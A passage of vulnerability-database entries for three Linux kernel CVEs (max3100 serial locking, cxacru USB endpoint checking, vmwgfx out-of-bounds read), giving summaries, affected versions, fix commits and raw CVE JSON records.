          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nserial: max3100: Lock port-\u003elock when calling uart_handle_cts_change()\n\nuart_handle_cts_change() has to be called with port lock taken,\nSince we run it in a separate work, the lock may not be taken at\nthe time of running. Make sure that it\u0027s taken by explicitly doing\nthat. Without it we got a splat:\n\n  WARNING: CPU: 0 PID: 10 at drivers/tty/serial/serial_core.c:3491 uart_handle_cts_change+0xa6/0xb0\n  ...\n  Workqueue: max3100-0 max3100_work [max3100]\n  RIP: 0010:uart_handle_cts_change+0xa6/0xb0\n  ...\n   max3100_handlerx+0xc5/0x110 [max3100]\n   max3100_work+0x12a/0x340 [max3100]"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:15:46.722Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/44b38924135d2093e2ec1812969464845dd66dc9"
        },
        {
          "url": "https://git.kernel.org/stable/c/ea9b35372b58ac2931bfc1d5bc25e839d1221e30"
        },
        {
          "url": "https://git.kernel.org/stable/c/cc121e3722a0a2c8f716ef991e5425b180a5fb94"
        },
        {
          "url": "https://git.kernel.org/stable/c/78dbda51bb4241b88a52d71620f06231a341f9ba"
        },
        {
          "url": "https://git.kernel.org/stable/c/8296bb9e5925b6634259c5d4daee88f0cc0884ec"
        },
        {
          "url": "https://git.kernel.org/stable/c/93df2fba6c7dfa9a2f08546ea9a5ca4728758458"
        },
        {
          "url": "https://git.kernel.org/stable/c/865b30c8661924ee9145f442bf32cea549faa869"
        },
        {
          "url": "https://git.kernel.org/stable/c/77ab53371a2066fdf9b895246505f5ef5a4b5d47"
        }
      ],
      "title": "serial: max3100: Lock port-\u003elock when calling uart_handle_cts_change()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38634",
    "datePublished": "2024-06-21T10:18:23.573Z",
    "dateReserved": "2024-06-18T19:36:34.947Z",
    "dateUpdated": "2025-11-04T17:21:53.204Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-41097 (GCVE-0-2024-41097)

Vulnerability from cvelistv5 – Published: 2024-07-29 15:48 – Updated: 2025-11-03 22:00

Title

usb: atm: cxacru: fix endpoint checking in cxacru_bind()

Summary

In the Linux kernel, the following vulnerability has been resolved: usb: atm: cxacru: fix endpoint checking in cxacru_bind() Syzbot is still reporting quite an old issue [1] that occurs due to incomplete checking of present usb endpoints. As such, wrong endpoints types may be used at urb sumbitting stage which in turn triggers a warning in usb_submit_urb(). Fix the issue by verifying that required endpoint types are present for both in and out endpoints, taking into account cmd endpoint type. Unfortunately, this patch has not been tested on real hardware. [1] Syzbot report: usb 1-1: BOGUS urb xfer, pipe 1 != type 3 WARNING: CPU: 0 PID: 8667 at drivers/usb/core/urb.c:502 usb_submit_urb+0xed2/0x18a0 drivers/usb/core/urb.c:502 Modules linked in: CPU: 0 PID: 8667 Comm: kworker/0:4 Not tainted 5.14.0-rc4-syzkaller #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011 Workqueue: usb_hub_wq hub_event RIP: 0010:usb_submit_urb+0xed2/0x18a0 drivers/usb/core/urb.c:502 ... Call Trace: cxacru_cm+0x3c0/0x8e0 drivers/usb/atm/cxacru.c:649 cxacru_card_status+0x22/0xd0 drivers/usb/atm/cxacru.c:760 cxacru_bind+0x7ac/0x11a0 drivers/usb/atm/cxacru.c:1209 usbatm_usb_probe+0x321/0x1ae0 drivers/usb/atm/usbatm.c:1055 cxacru_usb_probe+0xdf/0x1e0 drivers/usb/atm/cxacru.c:1363 usb_probe_interface+0x315/0x7f0 drivers/usb/core/driver.c:396 call_driver_probe drivers/base/dd.c:517 [inline] really_probe+0x23c/0xcd0 drivers/base/dd.c:595 __driver_probe_device+0x338/0x4d0 drivers/base/dd.c:747 driver_probe_device+0x4c/0x1a0 drivers/base/dd.c:777 __device_attach_driver+0x20b/0x2f0 drivers/base/dd.c:894 bus_for_each_drv+0x15f/0x1e0 drivers/base/bus.c:427 __device_attach+0x228/0x4a0 drivers/base/dd.c:965 bus_probe_device+0x1e4/0x290 drivers/base/bus.c:487 device_add+0xc2f/0x2180 drivers/base/core.c:3354 usb_set_configuration+0x113a/0x1910 drivers/usb/core/message.c:2170 usb_generic_driver_probe+0xba/0x100 drivers/usb/core/generic.c:238 usb_probe_device+0xd9/0x2c0 drivers/usb/core/driver.c:293

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/5159a81924311c1ec…
	https://git.kernel.org/stable/c/23926d316d2836315…
	https://git.kernel.org/stable/c/75ddbf776dd04a09f…
	https://git.kernel.org/stable/c/1aac4be1aaa517750…
	https://git.kernel.org/stable/c/5584c776a1af7807c…
	https://git.kernel.org/stable/c/f536f09eb45e4de8d…
	https://git.kernel.org/stable/c/ac9007520e392541a…
	https://git.kernel.org/stable/c/2eabb655a968b862b…

Impacted products

Vendor

Product

Version

Linux

Affected: 902ffc3c707c1d459ea57428a619a807cbe412f9 , < 5159a81924311c1ec786ad9fdef784ead8676a6a (git)
Affected: 902ffc3c707c1d459ea57428a619a807cbe412f9 , < 23926d316d2836315cb113569f91393266eb5b47 (git)
Affected: 902ffc3c707c1d459ea57428a619a807cbe412f9 , < 75ddbf776dd04a09fb9e5267ead5d0c989f84506 (git)
Affected: 902ffc3c707c1d459ea57428a619a807cbe412f9 , < 1aac4be1aaa5177506219f01dce5e29194e5e95a (git)
Affected: 902ffc3c707c1d459ea57428a619a807cbe412f9 , < 5584c776a1af7807ca815ee6265f2c1429fc5727 (git)
Affected: 902ffc3c707c1d459ea57428a619a807cbe412f9 , < f536f09eb45e4de8d1b9accee9d992aa1846f1d4 (git)
Affected: 902ffc3c707c1d459ea57428a619a807cbe412f9 , < ac9007520e392541a29daebaae8b9109007bc781 (git)
Affected: 902ffc3c707c1d459ea57428a619a807cbe412f9 , < 2eabb655a968b862bc0c31629a09f0fbf3c80d51 (git)
Affected: aef30a0bfdf6c10565285fff1ae8400b34ee0d81 (git)

Linux

Affected: 2.6.36
Unaffected: 0 , < 2.6.36 (semver)
Unaffected: 4.19.317 , ≤ 4.19.* (semver)
Unaffected: 5.4.279 , ≤ 5.4.* (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.97 , ≤ 6.1.* (semver)
Unaffected: 6.6.37 , ≤ 6.6.* (semver)
Unaffected: 6.9.8 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:00:55.190Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5159a81924311c1ec786ad9fdef784ead8676a6a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/23926d316d2836315cb113569f91393266eb5b47"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/75ddbf776dd04a09fb9e5267ead5d0c989f84506"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1aac4be1aaa5177506219f01dce5e29194e5e95a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5584c776a1af7807ca815ee6265f2c1429fc5727"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f536f09eb45e4de8d1b9accee9d992aa1846f1d4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ac9007520e392541a29daebaae8b9109007bc781"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2eabb655a968b862bc0c31629a09f0fbf3c80d51"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41097",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:20:18.903942Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:08.858Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/atm/cxacru.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5159a81924311c1ec786ad9fdef784ead8676a6a",
              "status": "affected",
              "version": "902ffc3c707c1d459ea57428a619a807cbe412f9",
              "versionType": "git"
            },
            {
              "lessThan": "23926d316d2836315cb113569f91393266eb5b47",
              "status": "affected",
              "version": "902ffc3c707c1d459ea57428a619a807cbe412f9",
              "versionType": "git"
            },
            {
              "lessThan": "75ddbf776dd04a09fb9e5267ead5d0c989f84506",
              "status": "affected",
              "version": "902ffc3c707c1d459ea57428a619a807cbe412f9",
              "versionType": "git"
            },
            {
              "lessThan": "1aac4be1aaa5177506219f01dce5e29194e5e95a",
              "status": "affected",
              "version": "902ffc3c707c1d459ea57428a619a807cbe412f9",
              "versionType": "git"
            },
            {
              "lessThan": "5584c776a1af7807ca815ee6265f2c1429fc5727",
              "status": "affected",
              "version": "902ffc3c707c1d459ea57428a619a807cbe412f9",
              "versionType": "git"
            },
            {
              "lessThan": "f536f09eb45e4de8d1b9accee9d992aa1846f1d4",
              "status": "affected",
              "version": "902ffc3c707c1d459ea57428a619a807cbe412f9",
              "versionType": "git"
            },
            {
              "lessThan": "ac9007520e392541a29daebaae8b9109007bc781",
              "status": "affected",
              "version": "902ffc3c707c1d459ea57428a619a807cbe412f9",
              "versionType": "git"
            },
            {
              "lessThan": "2eabb655a968b862bc0c31629a09f0fbf3c80d51",
              "status": "affected",
              "version": "902ffc3c707c1d459ea57428a619a807cbe412f9",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "aef30a0bfdf6c10565285fff1ae8400b34ee0d81",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/atm/cxacru.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.36"
            },
            {
              "lessThan": "2.6.36",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.317",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.279",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.97",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.37",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.317",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.279",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.97",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.37",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.8",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "2.6.35.5",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: atm: cxacru: fix endpoint checking in cxacru_bind()\n\nSyzbot is still reporting quite an old issue [1] that occurs due to\nincomplete checking of present usb endpoints. As such, wrong\nendpoints types may be used at urb sumbitting stage which in turn\ntriggers a warning in usb_submit_urb().\n\nFix the issue by verifying that required endpoint types are present\nfor both in and out endpoints, taking into account cmd endpoint type.\n\nUnfortunately, this patch has not been tested on real hardware.\n\n[1] Syzbot report:\nusb 1-1: BOGUS urb xfer, pipe 1 != type 3\nWARNING: CPU: 0 PID: 8667 at drivers/usb/core/urb.c:502 usb_submit_urb+0xed2/0x18a0 drivers/usb/core/urb.c:502\nModules linked in:\nCPU: 0 PID: 8667 Comm: kworker/0:4 Not tainted 5.14.0-rc4-syzkaller #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011\nWorkqueue: usb_hub_wq hub_event\nRIP: 0010:usb_submit_urb+0xed2/0x18a0 drivers/usb/core/urb.c:502\n...\nCall Trace:\n cxacru_cm+0x3c0/0x8e0 drivers/usb/atm/cxacru.c:649\n cxacru_card_status+0x22/0xd0 drivers/usb/atm/cxacru.c:760\n cxacru_bind+0x7ac/0x11a0 drivers/usb/atm/cxacru.c:1209\n usbatm_usb_probe+0x321/0x1ae0 drivers/usb/atm/usbatm.c:1055\n cxacru_usb_probe+0xdf/0x1e0 drivers/usb/atm/cxacru.c:1363\n usb_probe_interface+0x315/0x7f0 drivers/usb/core/driver.c:396\n call_driver_probe drivers/base/dd.c:517 [inline]\n really_probe+0x23c/0xcd0 drivers/base/dd.c:595\n __driver_probe_device+0x338/0x4d0 drivers/base/dd.c:747\n driver_probe_device+0x4c/0x1a0 drivers/base/dd.c:777\n __device_attach_driver+0x20b/0x2f0 drivers/base/dd.c:894\n bus_for_each_drv+0x15f/0x1e0 drivers/base/bus.c:427\n __device_attach+0x228/0x4a0 drivers/base/dd.c:965\n bus_probe_device+0x1e4/0x290 drivers/base/bus.c:487\n device_add+0xc2f/0x2180 drivers/base/core.c:3354\n usb_set_configuration+0x113a/0x1910 drivers/usb/core/message.c:2170\n usb_generic_driver_probe+0xba/0x100 drivers/usb/core/generic.c:238\n usb_probe_device+0xd9/0x2c0 drivers/usb/core/driver.c:293"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:57:34.376Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/5159a81924311c1ec786ad9fdef784ead8676a6a"
        },
        {
          "url": "https://git.kernel.org/stable/c/23926d316d2836315cb113569f91393266eb5b47"
        },
        {
          "url": "https://git.kernel.org/stable/c/75ddbf776dd04a09fb9e5267ead5d0c989f84506"
        },
        {
          "url": "https://git.kernel.org/stable/c/1aac4be1aaa5177506219f01dce5e29194e5e95a"
        },
        {
          "url": "https://git.kernel.org/stable/c/5584c776a1af7807ca815ee6265f2c1429fc5727"
        },
        {
          "url": "https://git.kernel.org/stable/c/f536f09eb45e4de8d1b9accee9d992aa1846f1d4"
        },
        {
          "url": "https://git.kernel.org/stable/c/ac9007520e392541a29daebaae8b9109007bc781"
        },
        {
          "url": "https://git.kernel.org/stable/c/2eabb655a968b862bc0c31629a09f0fbf3c80d51"
        }
      ],
      "title": "usb: atm: cxacru: fix endpoint checking in cxacru_bind()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41097",
    "datePublished": "2024-07-29T15:48:10.175Z",
    "dateReserved": "2024-07-12T12:17:45.637Z",
    "dateUpdated": "2025-11-03T22:00:55.190Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-36960 (GCVE-0-2024-36960)

Vulnerability from cvelistv5 – Published: 2024-06-03 07:49 – Updated: 2025-05-04 09:12

Title

drm/vmwgfx: Fix invalid reads in fence signaled events

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/vmwgfx: Fix invalid reads in fence signaled events Correctly set the length of the drm_event to the size of the structure that's actually used. The length of the drm_event was set to the parent structure instead of to the drm_vmw_event_fence which is supposed to be read. drm_read uses the length parameter to copy the event to the user space thus resuling in oob reads.

Severity ?

No CVSS data available.

CWE

CWE-125 - Out-of-bounds Read

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/2f527e3efd37c7c5e…
	https://git.kernel.org/stable/c/cef0962f2d3e5fd06…
	https://git.kernel.org/stable/c/3cd682357c6167f63…
	https://git.kernel.org/stable/c/b7bab33c4623c66e3…
	https://git.kernel.org/stable/c/0dbfc73670b357456…
	https://git.kernel.org/stable/c/7b5fd3af4a250dd0a…
	https://git.kernel.org/stable/c/deab66596dfad14f1…
	https://git.kernel.org/stable/c/a37ef7613c00f2d72…

Impacted products

Vendor

Product

Version

Linux

Affected: 8b7de6aa84682a3396544fd88cd457f95484573a , < 2f527e3efd37c7c5e85e8aa86308856b619fa59f (git)
Affected: 8b7de6aa84682a3396544fd88cd457f95484573a , < cef0962f2d3e5fd0660c8efb72321083a1b531a9 (git)
Affected: 8b7de6aa84682a3396544fd88cd457f95484573a , < 3cd682357c6167f636aec8ac0efaa8ba61144d36 (git)
Affected: 8b7de6aa84682a3396544fd88cd457f95484573a , < b7bab33c4623c66e3398d5253870d4e88c52dfc0 (git)
Affected: 8b7de6aa84682a3396544fd88cd457f95484573a , < 0dbfc73670b357456196130551e586345ca48e1b (git)
Affected: 8b7de6aa84682a3396544fd88cd457f95484573a , < 7b5fd3af4a250dd0a2a558e07b43478748eb5d22 (git)
Affected: 8b7de6aa84682a3396544fd88cd457f95484573a , < deab66596dfad14f1c54eeefdb72428340d72a77 (git)
Affected: 8b7de6aa84682a3396544fd88cd457f95484573a , < a37ef7613c00f2d72c8fc08bd83fb6cc76926c8c (git)

Linux

Affected: 3.4
Unaffected: 0 , < 3.4 (semver)
Unaffected: 4.19.314 , ≤ 4.19.* (semver)
Unaffected: 5.4.276 , ≤ 5.4.* (semver)
Unaffected: 5.10.217 , ≤ 5.10.* (semver)
Unaffected: 5.15.159 , ≤ 5.15.* (semver)
Unaffected: 6.1.91 , ≤ 6.1.* (semver)
Unaffected: 6.6.31 , ≤ 6.6.* (semver)
Unaffected: 6.8.10 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36960",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-03T13:45:10.318634Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-125",
                "description": "CWE-125 Out-of-bounds Read",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:47:40.946Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:43:50.585Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2f527e3efd37c7c5e85e8aa86308856b619fa59f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cef0962f2d3e5fd0660c8efb72321083a1b531a9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3cd682357c6167f636aec8ac0efaa8ba61144d36"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b7bab33c4623c66e3398d5253870d4e88c52dfc0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0dbfc73670b357456196130551e586345ca48e1b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7b5fd3af4a250dd0a2a558e07b43478748eb5d22"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/deab66596dfad14f1c54eeefdb72428340d72a77"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a37ef7613c00f2d72c8fc08bd83fb6cc76926c8c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/vmwgfx/vmwgfx_fence.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "2f527e3efd37c7c5e85e8aa86308856b619fa59f",
              "status": "affected",
              "version": "8b7de6aa84682a3396544fd88cd457f95484573a",
              "versionType": "git"
            },
            {
              "lessThan": "cef0962f2d3e5fd0660c8efb72321083a1b531a9",
              "status": "affected",
              "version": "8b7de6aa84682a3396544fd88cd457f95484573a",
              "versionType": "git"
            },
            {
              "lessThan": "3cd682357c6167f636aec8ac0efaa8ba61144d36",
              "status": "affected",
              "version": "8b7de6aa84682a3396544fd88cd457f95484573a",
              "versionType": "git"
            },
            {
              "lessThan": "b7bab33c4623c66e3398d5253870d4e88c52dfc0",
              "status": "affected",
              "version": "8b7de6aa84682a3396544fd88cd457f95484573a",
              "versionType": "git"
            },
            {
              "lessThan": "0dbfc73670b357456196130551e586345ca48e1b",
              "status": "affected",
              "version": "8b7de6aa84682a3396544fd88cd457f95484573a",
              "versionType": "git"
            },
            {
              "lessThan": "7b5fd3af4a250dd0a2a558e07b43478748eb5d22",
              "status": "affected",
              "version": "8b7de6aa84682a3396544fd88cd457f95484573a",
              "versionType": "git"
            },
            {
              "lessThan": "deab66596dfad14f1c54eeefdb72428340d72a77",
              "status": "affected",
              "version": "8b7de6aa84682a3396544fd88cd457f95484573a",
              "versionType": "git"
            },
            {
              "lessThan": "a37ef7613c00f2d72c8fc08bd83fb6cc76926c8c",
              "status": "affected",
              "version": "8b7de6aa84682a3396544fd88cd457f95484573a",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/vmwgfx/vmwgfx_fence.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.4"
            },
            {
              "lessThan": "3.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.314",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.276",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.217",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.159",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.91",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.31",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.314",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.276",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.217",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.159",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.91",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.31",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.10",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/vmwgfx: Fix invalid reads in fence signaled events\n\nCorrectly set the length of the drm_event to the size of the structure\nthat\u0027s actually used.\n\nThe length of the drm_event was set to the parent structure instead of\nto the drm_vmw_event_fence which is supposed to be read. drm_read\nuses the length parameter to copy the event to the user space thus\nresuling in oob reads."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:12:52.237Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/2f527e3efd37c7c5e85e8aa86308856b619fa59f"
        },
        {
          "url": "https://git.kernel.org/stable/c/cef0962f2d3e5fd0660c8efb72321083a1b531a9"
        },
        {
          "url": "https://git.kernel.org/stable/c/3cd682357c6167f636aec8ac0efaa8ba61144d36"
        },
        {
          "url": "https://git.kernel.org/stable/c/b7bab33c4623c66e3398d5253870d4e88c52dfc0"
        },
        {
          "url": "https://git.kernel.org/stable/c/0dbfc73670b357456196130551e586345ca48e1b"
        },
        {
          "url": "https://git.kernel.org/stable/c/7b5fd3af4a250dd0a2a558e07b43478748eb5d22"
        },
        {
          "url": "https://git.kernel.org/stable/c/deab66596dfad14f1c54eeefdb72428340d72a77"
        },
        {
          "url": "https://git.kernel.org/stable/c/a37ef7613c00f2d72c8fc08bd83fb6cc76926c8c"
        }
      ],
      "title": "drm/vmwgfx: Fix invalid reads in fence signaled events",
      "x_generator": {
